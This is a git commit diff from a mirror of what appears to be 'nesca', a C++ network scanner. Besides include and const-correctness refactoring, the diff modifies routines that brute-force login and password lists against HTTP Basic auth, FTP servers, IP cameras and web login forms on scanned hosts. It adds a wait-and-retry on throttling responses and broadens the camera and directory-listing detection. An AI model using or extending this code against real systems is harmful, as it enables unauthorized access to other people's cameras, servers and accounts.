mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 10:42:21 +00:00
not-a-single-fcuk-version
This commit is contained in:
parent
90b6c317e9
commit
2b5c7fc0aa
1
.gitignore
vendored
1
.gitignore
vendored
@ -31,3 +31,4 @@ tags.txt
|
||||
version
|
||||
lisca.cpp
|
||||
main - копия.cpp
|
||||
result_files-*
|
||||
|
@ -1,13 +1,30 @@
|
||||
#include <BasicAuth.h>
|
||||
#include "BasicAuth.h"
|
||||
|
||||
bool BA::checkOutput(const string *buffer) {
|
||||
if(Utils::ci_find_substr(*buffer, "200 ok") != -1 ||
|
||||
bool BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
||||
if((Utils::ci_find_substr(*buffer, "200 ok") != -1 ||
|
||||
Utils::ci_find_substr(*buffer, "http/1.0 200") != -1 ||
|
||||
Utils::ci_find_substr(*buffer, "http/1.1 200") != -1
|
||||
Utils::ci_find_substr(*buffer, "http/1.1 200") != -1)
|
||||
&& Utils::ci_find_substr(*buffer, "http/1.1 401 ") == -1
|
||||
&& Utils::ci_find_substr(*buffer, "http/1.0 401 ") == -1
|
||||
&& Utils::ci_find_substr(*buffer, "<statusValue>401</statusValue>") == -1
|
||||
&& Utils::ci_find_substr(*buffer, "<statusString>Unauthorized</statusString>") == -1
|
||||
&& Utils::ci_find_substr(*buffer, "íåïðàâèëüíû") == -1
|
||||
&& Utils::ci_find_substr(*buffer, "Ð<EFBFBD>еправильны") == -1
|
||||
) {
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
||||
else if (Utils::ci_find_substr(*buffer, "503 service unavailable") != -1
|
||||
|| Utils::ci_find_substr(*buffer, "http/1.1 503") != -1
|
||||
|| Utils::ci_find_substr(*buffer, "http/1.0 503") != -1
|
||||
|| Utils::ci_find_substr(*buffer, "400 BAD_REQUEST") != -1
|
||||
|| Utils::ci_find_substr(*buffer, "400 bad request") != -1
|
||||
|| Utils::ci_find_substr(*buffer, "403 Forbidden") != -1
|
||||
)
|
||||
{
|
||||
stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
|
||||
|
||||
Sleep(30000);
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
@ -28,15 +45,15 @@ lopaStr BA::_BABrute(const char *ip, const int port) {
|
||||
|
||||
lpString = string(loginLst[i]) + ":" + string(passLst[j]);
|
||||
|
||||
Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString);
|
||||
if (Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString) == -2) return lps;
|
||||
|
||||
if(checkOutput(&buffer)) {
|
||||
if(checkOutput(&buffer, ip, port)) {
|
||||
strcpy(lps.login, loginLst[i]);
|
||||
strcpy(lps.pass, passLst[j]);
|
||||
return lps;
|
||||
};
|
||||
|
||||
Sleep(70);
|
||||
Sleep(100);
|
||||
}
|
||||
}
|
||||
|
||||
|
14
BasicAuth.h
14
BasicAuth.h
@ -1,15 +1,15 @@
|
||||
#ifndef BASICAUTH_H
|
||||
#define BASICAUTH_H
|
||||
|
||||
#include <Connector.h>
|
||||
#include <BruteUtils.h>
|
||||
#include <Utils.h>
|
||||
#include <externData.h>
|
||||
#include <mainResources.h>
|
||||
#include "Connector.h"
|
||||
#include "BruteUtils.h"
|
||||
#include "Utils.h"
|
||||
#include "externData.h"
|
||||
#include "mainResources.h"
|
||||
|
||||
class BA : BruteUtils{
|
||||
class BA {
|
||||
private:
|
||||
static bool checkOutput(const string *buffer);
|
||||
static bool checkOutput(const string *buffer, const char *ip, const int port);
|
||||
static lopaStr _BABrute(const char *ip, const int port);
|
||||
|
||||
public:
|
||||
|
@ -1,9 +1,10 @@
|
||||
#include <BruteUtils.h>
|
||||
#include "BruteUtils.h"
|
||||
#include "STh.h"
|
||||
#include "externData.h"
|
||||
|
||||
void BruteUtils::BConInc()
|
||||
{
|
||||
++BA;
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
__asm
|
||||
{
|
||||
@ -31,5 +32,4 @@ void BruteUtils::BConDec()
|
||||
}
|
||||
|
||||
stt->doEmitionChangeBA(QString::number(BrutingThrds));
|
||||
|
||||
}
|
||||
|
@ -3,8 +3,8 @@
|
||||
#include "STh.h"
|
||||
#include "externData.h"
|
||||
#include "externFunctions.h"
|
||||
#include <Connector.h>
|
||||
#include <Utils.h>
|
||||
#include "Connector.h"
|
||||
#include "Utils.h"
|
||||
|
||||
void getSubStrEx(const char *src, char *startStr, char *endStr, char *dest, int szDest)
|
||||
{
|
||||
|
@ -1,7 +1,7 @@
|
||||
#include <Connector.h>
|
||||
#include "Connector.h"
|
||||
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
int _pingMyTarget(char *ip)
|
||||
int _pingMyTarget(const char *ip)
|
||||
{
|
||||
HANDLE hIcmpFile;
|
||||
unsigned long ipaddr = INADDR_NONE;
|
||||
@ -231,9 +231,9 @@ int my_trace(CURL *handle, curl_infotype type,
|
||||
void *userp)
|
||||
{
|
||||
if (type == CURLINFO_HEADER_OUT) {
|
||||
Activity += strlen(data);
|
||||
data[strstr(data, "\r\n\r\n") - data] = '\0';
|
||||
stt->doEmitionAddOutData(QString(data));
|
||||
data[size] = '\0';
|
||||
Activity += strlen(data);
|
||||
stt->doEmitionAddOutData(QString(data));
|
||||
}
|
||||
|
||||
return 0;
|
||||
@ -284,7 +284,6 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
|
||||
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
|
||||
|
||||
if(postData != NULL) {
|
||||
|
||||
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData);
|
||||
};
|
||||
|
||||
@ -300,29 +299,61 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
|
||||
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk);
|
||||
}
|
||||
|
||||
if(lpString != NULL) {
|
||||
curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_ANY);
|
||||
//curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, TRUE);
|
||||
curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
|
||||
};
|
||||
|
||||
//if(curl_easy_perform(curl) == CURLE_OK) {
|
||||
if(1) {
|
||||
curl_easy_cleanup(curl);
|
||||
} else {
|
||||
curl_easy_cleanup(curl);
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (lpString != NULL) {
|
||||
curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_ANY);
|
||||
curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, TRUE);
|
||||
curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
|
||||
};
|
||||
|
||||
int res = curl_easy_perform(curl);
|
||||
curl_easy_cleanup(curl);
|
||||
|
||||
if (res == CURLE_OK ||
|
||||
(port == 21 && buffer->size() > 0)) {
|
||||
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
|
||||
Activity += buffer->size();
|
||||
return buffer->size();
|
||||
} else {
|
||||
if (res != 28 &&
|
||||
res != 7 &&
|
||||
res != 67 &&
|
||||
res != 52 &&
|
||||
res != 55 &&
|
||||
res != 56) {
|
||||
if (res == 5) {
|
||||
stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. ");
|
||||
return -2;
|
||||
}
|
||||
else if (res == 13) {
|
||||
stt->doEmitionFoundData("Unknown ftp: (" + QString::number(res) + ") " +
|
||||
QString(ip) + ":" + QString::number(port));
|
||||
return -2;
|
||||
} else if (res == 8) {
|
||||
stt->doEmitionFoundData("Strange ftp reply: (" +
|
||||
QString::number(res) + ") " + QString(ip) +
|
||||
":" + QString::number(port));
|
||||
return -2;
|
||||
}
|
||||
else if (res == 6) {
|
||||
stt->doEmitionFoundData("Couldn't resolve host. (" +
|
||||
QString::number(res) + ") " + QString(ip) +
|
||||
":" + QString::number(port));
|
||||
return -2;
|
||||
}
|
||||
else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " +
|
||||
QString(ip) + ":" + QString::number(port));
|
||||
}
|
||||
++offlines;
|
||||
return -1;
|
||||
}
|
||||
} else {
|
||||
stt->doEmitionRedFoundData("Curl error.");
|
||||
return -1;
|
||||
};
|
||||
};
|
||||
|
||||
if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
|
||||
|
||||
Activity += buffer->size();
|
||||
return buffer->size();
|
||||
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
|
||||
Activity += buffer->size();
|
||||
return buffer->size();
|
||||
}
|
||||
|
||||
int Connector::_ConnectToPort(string ip, int port, char *hl)
|
||||
@ -338,17 +369,17 @@ int Connector::_ConnectToPort(string ip, int port, char *hl)
|
||||
std::string buffer;
|
||||
int size = 0;
|
||||
|
||||
if(port == 22) size = _SSHLobby(ip.c_str(), port, &buffer);
|
||||
if (port == 22) size = _SSHLobby(ip.c_str(), port, &buffer);
|
||||
else size = nConnect(ip.c_str(), port, &buffer);
|
||||
|
||||
// if(size > 0)
|
||||
// {
|
||||
// ++Alive;
|
||||
// ++found;
|
||||
// stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
|
||||
// Lexems lx;
|
||||
// lx._filler(port, buffer.c_str(), ip, size, &lx, hl);
|
||||
// };
|
||||
if(size > 0)
|
||||
{
|
||||
++Alive;
|
||||
++found;
|
||||
stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
|
||||
Lexems lx;
|
||||
lx._filler(port, buffer.c_str(), (char*)ip.c_str(), size, &lx, hl);
|
||||
};
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
@ -1,9 +1,9 @@
|
||||
#ifndef CONNECTOR_H
|
||||
#define CONNECTOR_H
|
||||
|
||||
#include <externData.h>
|
||||
#include <Utils.h>
|
||||
#include <BruteUtils.h>
|
||||
#include "externData.h"
|
||||
#include "Utils.h"
|
||||
#include "BruteUtils.h"
|
||||
#include "STh.h"
|
||||
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
@ -12,7 +12,7 @@
|
||||
#pragma comment(lib, "iphlpapi.lib")
|
||||
#pragma comment(lib,"curllib.lib")
|
||||
#endif
|
||||
#include <mainResources.h>
|
||||
#include "mainResources.h"
|
||||
|
||||
class Connector {
|
||||
|
||||
|
@ -1,10 +1,11 @@
|
||||
#include "DrawerTh_ME2Scanner.h"
|
||||
#include "STh.h"
|
||||
#include "externData.h"
|
||||
#include <WebformWorker.h>
|
||||
#include "WebformWorker.h"
|
||||
|
||||
QList<QGraphicsPathItem*> DrawerTh_ME2Scanner::itmList;
|
||||
QVector<QPointF> DrawerTh_ME2Scanner::polyVect;
|
||||
int DrawerTh_ME2Scanner::vecSize;
|
||||
|
||||
void DrawerTh_ME2Scanner::doEmitDrawTextPlacers()
|
||||
{
|
||||
@ -16,9 +17,9 @@ void DrawerTh_ME2Scanner::doEmitionAddPolyLine()
|
||||
emit dtME2->sAddPolyLine();
|
||||
}
|
||||
|
||||
void MakePolygonLine(int gWidth)
|
||||
int MakePolygonLine(int gWidth)
|
||||
{
|
||||
DrawerTh_ME2Scanner::polyVect.clear();
|
||||
while (!DrawerTh_ME2Scanner::polyVect.empty()) Sleep(100);
|
||||
int x = 0;
|
||||
int tx = 0;
|
||||
int xtx = 0;
|
||||
@ -127,6 +128,7 @@ void MakePolygonLine(int gWidth)
|
||||
Susp = 0;
|
||||
|
||||
DrawerTh_ME2Scanner::polyVect.append(QPointF(gWidth, ME2YPOS));
|
||||
return DrawerTh_ME2Scanner::polyVect.size();
|
||||
}
|
||||
|
||||
void DrawerTh_ME2Scanner::run()
|
||||
@ -139,7 +141,7 @@ void DrawerTh_ME2Scanner::run()
|
||||
if (widgetIsHidden == false && tray->isVisible() == false)
|
||||
{
|
||||
if (itmList.count() < 39) {
|
||||
MakePolygonLine(gWidth);
|
||||
vecSize = MakePolygonLine(gWidth);
|
||||
dtME2->doEmitionAddPolyLine();
|
||||
}
|
||||
}
|
||||
|
@ -10,6 +10,7 @@ class DrawerTh_ME2Scanner : public QThread
|
||||
Q_OBJECT
|
||||
|
||||
public:
|
||||
static int vecSize;
|
||||
static QList<QGraphicsPathItem*> itmList;
|
||||
static QVector<QPointF> polyVect;
|
||||
|
||||
|
27
FTPAuth.cpp
27
FTPAuth.cpp
@ -1,8 +1,6 @@
|
||||
#include "FTPAuth.h"
|
||||
|
||||
bool FTPA::checkOutput(const string *buffer) {
|
||||
//Login or password incorrect!
|
||||
|
||||
if(Utils::ci_find_substr(*buffer, "230") != -1) {
|
||||
|
||||
return true;
|
||||
@ -11,7 +9,7 @@ bool FTPA::checkOutput(const string *buffer) {
|
||||
return false;
|
||||
}
|
||||
|
||||
lopaStr FTPA::_FTPBrute(const char *ip, const int port, const PathStr *ps) {
|
||||
lopaStr FTPA::_FTPBrute(const char *ip, const int port, PathStr *ps) {
|
||||
string buffer;
|
||||
string lpString;
|
||||
lopaStr lps;
|
||||
@ -20,6 +18,7 @@ lopaStr FTPA::_FTPBrute(const char *ip, const int port, const PathStr *ps) {
|
||||
ZeroMemory(lps.other, sizeof(lps.other));
|
||||
|
||||
strcpy(lps.login, "UNKNOWN");
|
||||
int res = 0;
|
||||
|
||||
for(int i = 0; i < MaxLogin; ++i)
|
||||
{
|
||||
@ -32,15 +31,17 @@ lopaStr FTPA::_FTPBrute(const char *ip, const int port, const PathStr *ps) {
|
||||
if(strlen(passLst[j]) <= 1) continue;
|
||||
|
||||
lpString = string(loginLst[i]) + ":" + string(passLst[j]);
|
||||
|
||||
Connector::nConnect((string("ftp://") + string(ip)).c_str(), port, &buffer, NULL, NULL, &lpString);
|
||||
|
||||
if(checkOutput(&buffer)) {
|
||||
strcpy(lps.login, loginLst[i]);
|
||||
strcpy(lps.pass, passLst[j]);
|
||||
return lps;
|
||||
};
|
||||
|
||||
|
||||
res = Connector::nConnect((string("ftp://") + string(ip)).c_str(), port, &buffer, NULL, NULL, &lpString);
|
||||
if (res == -2) return lps;
|
||||
else if (res != -1) {
|
||||
if (!globalScanFlag) return lps;
|
||||
strcpy(lps.login, loginLst[i]);
|
||||
strcpy(lps.pass, passLst[j]);
|
||||
ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');
|
||||
return lps;
|
||||
};
|
||||
|
||||
Sleep(70);
|
||||
}
|
||||
}
|
||||
@ -48,7 +49,7 @@ lopaStr FTPA::_FTPBrute(const char *ip, const int port, const PathStr *ps) {
|
||||
return lps;
|
||||
}
|
||||
|
||||
lopaStr FTPA::_FTPLobby(const char *ip, const int port, const PathStr *ps) {
|
||||
lopaStr FTPA::_FTPLobby(const char *ip, const int port, PathStr *ps) {
|
||||
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
||||
|
||||
BruteUtils::BConInc();
|
||||
|
14
FTPAuth.h
14
FTPAuth.h
@ -1,19 +1,19 @@
|
||||
#ifndef FTPAUTH_H
|
||||
#define FTPAUTH_H
|
||||
|
||||
#include <Connector.h>
|
||||
#include <BruteUtils.h>
|
||||
#include <Utils.h>
|
||||
#include <externData.h>
|
||||
#include <mainResources.h>
|
||||
#include "Connector.h"
|
||||
#include "BruteUtils.h"
|
||||
#include "Utils.h"
|
||||
#include "externData.h"
|
||||
#include "mainResources.h"
|
||||
|
||||
class FTPA {
|
||||
private:
|
||||
static bool checkOutput(const string *buffer);
|
||||
static lopaStr _FTPBrute(const char *ip, const int port, const PathStr *ps);
|
||||
static lopaStr _FTPBrute(const char *ip, const int port, PathStr *ps);
|
||||
|
||||
public:
|
||||
static lopaStr _FTPLobby(const char *ip, const int port, const PathStr *ps);
|
||||
static lopaStr _FTPLobby(const char *ip, const int port, PathStr *ps);
|
||||
};
|
||||
|
||||
#endif // FTPAUTH_H
|
||||
|
13
Threader.cpp
13
Threader.cpp
@ -1,4 +1,4 @@
|
||||
#include <Threader.h>
|
||||
#include "Threader.h"
|
||||
|
||||
int Threader::threadId = 0;
|
||||
std::mutex Threader::m;
|
||||
@ -8,22 +8,23 @@ std::queue<std::string> Threader::ipQueue;
|
||||
|
||||
void Threader::fireThread(std::string ip, void *func(void)) {
|
||||
|
||||
ipQueue.push(ip);
|
||||
|
||||
std::unique_lock<std::mutex> lk(m);
|
||||
ipQueue.push(ip);
|
||||
if(threadId < gThreads) {
|
||||
++threadId;
|
||||
std::thread workerThread(func);
|
||||
workerThread.detach();
|
||||
}
|
||||
|
||||
std::unique_lock<std::mutex> lk(m);
|
||||
ready = true;
|
||||
Threader::cv.notify_one();
|
||||
Sleep(gThreadDelay);
|
||||
}
|
||||
|
||||
//std::queue<std::string> empty;
|
||||
void Threader::cleanUp() {
|
||||
//std::swap( ipQueue, empty );
|
||||
ipQueue = {};
|
||||
std::unique_lock<std::mutex> lk(m);
|
||||
lk.unlock();
|
||||
lk.release();
|
||||
threadId = 0;
|
||||
}
|
||||
|
@ -1,8 +1,8 @@
|
||||
#ifndef THREADER_H
|
||||
#define THREADER_H
|
||||
|
||||
#include <mainResources.h>
|
||||
#include <externData.h>
|
||||
#include "mainResources.h"
|
||||
#include "externData.h"
|
||||
#include <thread>
|
||||
#include <mutex>
|
||||
#include <condition_variable>
|
||||
|
@ -1,4 +1,4 @@
|
||||
#include <Utils.h>
|
||||
#include "Utils.h"
|
||||
|
||||
char *getSystemProxy() {
|
||||
return "";
|
||||
|
@ -1,4 +1,4 @@
|
||||
#include <WebformWorker.h>
|
||||
#include "WebformWorker.h"
|
||||
|
||||
bool WFClass::active = false;
|
||||
|
||||
@ -49,7 +49,7 @@ lopaStr WFClass::parseResponse(const char *ip,
|
||||
else return result;
|
||||
}
|
||||
|
||||
lopaStr WFClass::doGetCheck(char *ip,
|
||||
lopaStr WFClass::doGetCheck(const char *ip,
|
||||
int port,
|
||||
char *actionVal,
|
||||
char *userVal,
|
||||
@ -92,7 +92,7 @@ lopaStr WFClass::doGetCheck(char *ip,
|
||||
return result;
|
||||
}
|
||||
|
||||
lopaStr WFClass::doPostCheck(char *ip,
|
||||
lopaStr WFClass::doPostCheck(const char *ip,
|
||||
int port,
|
||||
char *actionVal,
|
||||
char *userVal,
|
||||
@ -137,7 +137,7 @@ lopaStr WFClass::doPostCheck(char *ip,
|
||||
return result;
|
||||
}
|
||||
|
||||
lopaStr WFClass::_WFBrute( char *ip,
|
||||
lopaStr WFClass::_WFBrute( const char *ip,
|
||||
int port,
|
||||
char *methodVal,
|
||||
char *actionVal,
|
||||
|
@ -1,19 +1,19 @@
|
||||
#ifndef WEBFORMWORKER_H
|
||||
#define WEBFORMWORKER_H
|
||||
|
||||
#include <Utils.h>
|
||||
#include "Utils.h"
|
||||
#include "Connector.h"
|
||||
#include <mainResources.h>
|
||||
#include <externFunctions.h>
|
||||
#include <BruteUtils.h>
|
||||
#include "mainResources.h"
|
||||
#include "externFunctions.h"
|
||||
#include "BruteUtils.h"
|
||||
#include "STh.h"
|
||||
|
||||
class WFClass : BruteUtils {
|
||||
|
||||
private: static bool active;
|
||||
int passCounter = 1;
|
||||
lopaStr doGetCheck(char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal);
|
||||
lopaStr doPostCheck(char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal);
|
||||
lopaStr doGetCheck(const char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal);
|
||||
lopaStr doPostCheck(const char *ip, int port, char *actionVal, char *userVal, char *passVal, char *formVal);
|
||||
lopaStr parseResponse(const char *ip, const int port, const std::string *buffer, const char* formVal,
|
||||
const int *iIndex,
|
||||
const int *jIndex);
|
||||
@ -35,7 +35,7 @@ public:
|
||||
BConDec();
|
||||
}
|
||||
|
||||
lopaStr _WFBrute(char *ip,
|
||||
lopaStr _WFBrute(const char *ip,
|
||||
int port,
|
||||
char *methodVal,
|
||||
char *actionVal,
|
||||
|
@ -5,9 +5,9 @@
|
||||
#include "mainResources.h"
|
||||
#include "externFunctions.h"
|
||||
#include "externData.h"
|
||||
#include <openssl/err.h>
|
||||
#include <Utils.h>
|
||||
#include <BruteUtils.h>
|
||||
#include "openssl/err.h"
|
||||
#include "Utils.h"
|
||||
#include "BruteUtils.h"
|
||||
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
#include <iphlpapi.h>
|
||||
@ -334,7 +334,7 @@ char *_makeDigestResponse(
|
||||
return (char*)responseMD5;
|
||||
}
|
||||
|
||||
int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int passCounter, char *type, std::vector<char*> negVector)
|
||||
int _webLoginSeq(char *request, char *login, char *pass, const char *ip, int port, int passCounter, char *type, std::vector<char*> negVector)
|
||||
{
|
||||
char recvBuff[256] = {0};
|
||||
char recvBuff2[4096] = {0};
|
||||
@ -427,7 +427,7 @@ int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int
|
||||
return 0;
|
||||
}
|
||||
|
||||
lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
|
||||
lopaStr _IPCameraBrute(const char *ip, int port, char *SPEC)
|
||||
{
|
||||
lopaStr lps;
|
||||
ZeroMemory(lps.login, sizeof(lps.login));
|
||||
@ -486,6 +486,7 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
|
||||
negVector.push_back("РРјСЏ или пароль неверные!");
|
||||
negVector.push_back("Возврат");
|
||||
negVector.push_back("HTTP/1.0 302 Found");
|
||||
negVector.push_back("is incorrect");
|
||||
}
|
||||
else
|
||||
{
|
||||
@ -726,7 +727,7 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
|
||||
return lps;
|
||||
}
|
||||
|
||||
lopaStr _IPCameraBLobby(char *ip, int port, char *SPEC)
|
||||
lopaStr _IPCameraBLobby(const char *ip, int port, char *SPEC)
|
||||
{
|
||||
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
||||
|
||||
|
260
finder.cpp
260
finder.cpp
@ -184,7 +184,7 @@ char *GetCodePage(const char *str)
|
||||
};
|
||||
}
|
||||
|
||||
int globalSearchNeg(const char *buffcpy, char *ip, int port)
|
||||
int globalSearchNeg(const char *buffcpy, const char *ip, int port)
|
||||
{
|
||||
char negWord[256] = {0};
|
||||
for(int i = 0; i < GlobalNegativeSize; ++i)
|
||||
@ -245,7 +245,7 @@ int globalSearchPrnt(const char *buffcpy)
|
||||
return 0;
|
||||
}
|
||||
|
||||
int sharedDetector(char * ip, int port, const char *buffcpy) {
|
||||
int sharedDetector(const char * ip, int port, const char *buffcpy) {
|
||||
|
||||
if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL
|
||||
|| (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|
||||
@ -322,7 +322,7 @@ int sharedDetector(char * ip, int port, const char *buffcpy) {
|
||||
if((strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|
||||
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
|
||||
|| strstr(buffcpy, "hfs /") != NULL || strstr(buffcpy, "httpfileserver") != NULL
|
||||
|| strstr(buffcpy, "network camera") != NULL
|
||||
|| strstr(buffcpy, "network camera") != NULL || strstr(buffcpy, "index of") != NULL
|
||||
|| strstr(buffcpy, "$lock extended") != NULL || strstr(buffcpy, "ip camera") != NULL
|
||||
|| strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL
|
||||
|| strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL
|
||||
@ -342,7 +342,7 @@ int sharedDetector(char * ip, int port, const char *buffcpy) {
|
||||
}
|
||||
|
||||
// 500 < 1600
|
||||
int _mainFinderFirst(const char *buffcpy, int f, int port, char *ip)
|
||||
int _mainFinderFirst(const char *buffcpy, int f, int port, const char *ip)
|
||||
{
|
||||
int flag = sharedDetector(ip, port, buffcpy);
|
||||
if(flag != -2) return flag;
|
||||
@ -353,7 +353,7 @@ int _mainFinderFirst(const char *buffcpy, int f, int port, char *ip)
|
||||
}
|
||||
|
||||
//> 1600
|
||||
int _mainFinderSecond(const char *buffcpy, int port, char *ip)
|
||||
int _mainFinderSecond(const char *buffcpy, int port, const char *ip)
|
||||
{
|
||||
int flag = sharedDetector(ip, port, buffcpy);
|
||||
if(flag != -2) return flag;
|
||||
@ -361,7 +361,7 @@ int _mainFinderSecond(const char *buffcpy, int port, char *ip)
|
||||
return 3; //Suspicious
|
||||
}
|
||||
|
||||
int ContentFilter(const char *buff, int port, char *ip, char *cp)
|
||||
int ContentFilter(const char *buff, int port, const char *ip, char *cp)
|
||||
{
|
||||
if(buff != NULL)
|
||||
{
|
||||
@ -406,7 +406,7 @@ int ContentFilter(const char *buff, int port, char *ip, char *cp)
|
||||
else return -1;
|
||||
}
|
||||
|
||||
void fillGlobalLogData(char *ip, char *hostname, char *port, const char *sz, char *title,
|
||||
void fillGlobalLogData(const char *ip, char *hostname, char *port, const char *sz, char *title,
|
||||
const char *login, const char *pass, char *comment, char *cdpg, char *clss)
|
||||
{
|
||||
if(trackerOK == true)
|
||||
@ -456,15 +456,15 @@ int __checkFileExistence(int flag)
|
||||
{
|
||||
char fileName[64] = {0};
|
||||
|
||||
if(flag == 666 || flag == 350) strcpy(fileName, "./"RESULT_DIR_NAME"/STRANGE_ERROR.html");
|
||||
else if(flag == -22) strcpy(fileName, "./"RESULT_DIR_NAME"/ssh.html");
|
||||
else if(flag == 0 || flag == 15 || flag == -10) strcpy(fileName, "./"RESULT_DIR_NAME"/strange.html");
|
||||
else if(flag == 3) strcpy(fileName, "./"RESULT_DIR_NAME"/other.html");
|
||||
else if(flag == 7) strcpy(fileName, "./"RESULT_DIR_NAME"/low_loads.html");
|
||||
else if(flag == 10) strcpy(fileName, "./"RESULT_DIR_NAME"/LoginForms.html");
|
||||
else if(flag == 16) strcpy(fileName, "./"RESULT_DIR_NAME"/FTP.html");
|
||||
if(flag == 666 || flag == 350) strcpy(fileName, RESULT_DIR_NAME"/STRANGE_ERROR.html");
|
||||
else if(flag == -22) strcpy(fileName, RESULT_DIR_NAME"/ssh.html");
|
||||
else if(flag == 0 || flag == 15 || flag == -10) strcpy(fileName, RESULT_DIR_NAME"/strange.html");
|
||||
else if(flag == 3) strcpy(fileName, RESULT_DIR_NAME"/other.html");
|
||||
else if(flag == 7) strcpy(fileName, RESULT_DIR_NAME"/low_loads.html");
|
||||
else if(flag == 10) strcpy(fileName, RESULT_DIR_NAME"/LoginForms.html");
|
||||
else if(flag == 16) strcpy(fileName, RESULT_DIR_NAME"/FTP.html");
|
||||
else if(flag >= 17 || flag == 11 || flag == 12
|
||||
|| flag == 13 || flag == 14 || flag == 1) strcpy(fileName, "./"RESULT_DIR_NAME"/Basicauth.html");
|
||||
|| flag == 13 || flag == 14 || flag == 1) strcpy(fileName, RESULT_DIR_NAME"/Basicauth.html");
|
||||
|
||||
FILE *f = fopen(fileName, "r");
|
||||
if(f == NULL) return true;
|
||||
@ -489,43 +489,44 @@ char topBuff[1024] = {"<div id=\"tit\"><a href=\"strange.html\">.strange</a> <a
|
||||
void fputsf(char *text, int flag, char *msg)
|
||||
{
|
||||
FILE *file = NULL;
|
||||
char wew[256] = {0};
|
||||
|
||||
if(flag == 0 || flag == 15 || flag == -10)
|
||||
{
|
||||
if(ftsAnom) ftsAnom = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/strange.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/strange.html", "a");
|
||||
}
|
||||
else if(flag == 3)
|
||||
{
|
||||
if(ftsOther) ftsOther = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/other.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/other.html", "a");
|
||||
}
|
||||
else if(flag == -22)
|
||||
{
|
||||
if(ftsSSH) ftsSSH = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/SSH.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/SSH.html", "a");
|
||||
}
|
||||
else if(flag == 7)
|
||||
{
|
||||
if(ftsLL) ftsLL = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/low_loads.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/low_loads.html", "a");
|
||||
}
|
||||
else if(flag == 10)
|
||||
{
|
||||
if(ftsLF) ftsLF = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/LoginForms.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/LoginForms.html", "a");
|
||||
}
|
||||
else if(flag == 16)
|
||||
{
|
||||
if(ftsFTP) ftsFTP = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/FTP.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/FTP.html", "a");
|
||||
}
|
||||
else if(flag >= 17 || flag == 11 || flag == 12
|
||||
|| flag == 13 || flag == 14 || flag == 1
|
||||
)
|
||||
{
|
||||
if(ftsBA) ftsBA = __checkFileExistence(flag);
|
||||
file = fopen("./"RESULT_DIR_NAME"/Basicauth.html", "a");
|
||||
file = fopen(RESULT_DIR_NAME"/Basicauth.html", "a");
|
||||
}
|
||||
else
|
||||
{
|
||||
@ -675,27 +676,13 @@ void fputsf(char *text, int flag, char *msg)
|
||||
};
|
||||
}
|
||||
|
||||
